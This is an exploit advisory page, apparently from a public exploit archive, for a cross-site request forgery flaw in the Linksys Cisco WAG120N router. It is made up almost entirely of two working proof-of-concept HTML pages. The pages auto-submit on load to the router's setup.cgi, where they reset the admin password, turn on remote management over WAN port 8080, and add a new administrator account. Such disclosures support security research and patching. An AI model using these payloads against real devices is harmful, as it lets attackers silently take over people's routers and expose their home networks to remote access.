Linksys Cisco Wag120n Cross Site Request Forgery

2011.02.27

Credit: Khashayar Fereidani

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

----------------------------------------------------------------
Hardware : Linksys Cisco Wag120n(And perhaps similar versions)
Type of vunlnerability : CSRF ( Change Admin Password And Add User )
Risk of use : High
----------------------------------------------------------------
Producer Website : http://linksysbycisco.com
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
CSRF For Change Admin Password :
#Use sysPasswd and sysConfirmPasswd to set new password
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/setup.cgi";
method="POST" name="form">
<input type="hidden" name="user_list" value="1">
<input type="hidden" name="h_user_list" value="1">
<input type="hidden" name="sysname" value="admin">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="no">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>
----------------------------------------------------------------
CSRF For Add Administrator User:
#Use sysPasswd and sysConfirmPasswd to set new password
#if you add new user you should set pass_is_none=yes
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/setup.cgi";
method="POST" name="form">
<input type="hidden" name="user_list" value="2">
<input type="hidden" name="h_user_list" value="2">
<input type="hidden" name="sysname" value="ircrash">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="yes">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>
----------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Linksys Cisco Wag120n Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.